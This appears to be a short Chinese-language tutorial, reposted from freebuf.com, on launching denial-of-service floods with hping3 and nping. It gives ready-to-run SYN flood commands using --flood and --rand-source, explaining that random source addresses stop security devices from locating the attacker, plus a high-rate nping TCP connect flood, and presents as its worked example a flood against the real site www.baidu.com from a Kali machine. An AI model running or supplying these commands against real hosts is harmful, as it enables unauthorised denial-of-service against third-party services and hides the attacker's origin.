Hping3/Nping:TCP/IP数据包生成工具,用于压力测试、安全审计。
使用hping3进行DoS攻击(参数):
# hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com
-c:发送数据包的个数
-d:每个数据包的大小
-S:发送SYN数据包
-w:TCP window大小
-p:目标端口,你可以指定任意端口
–flood:尽可能快的发送数据包
–rand-source:使用随机的IP地址,使得安全设备不能定位实际IP;
-a或–spoof:隐藏主机名
testsite.com:目的IP地址或网站
SYN洪水攻击
使用hping3实现简单SYN洪水攻击:
# hping3 -S --flood -V testsite.com
TCP连接攻击
使用nping实现TCP连接攻击:
# nping --tcp-connect -rate=90000 -c 900000 -q testsite.com
例子:利用Nping或Hping3对百度进行DOS攻击;
环境:kali虚拟机
对百度进行TCP攻击
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.baidu.com
开启Wirehshark抓包分析
来源:freebuf.com 2021-05-17 21:22:43 by: Zxl2605
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册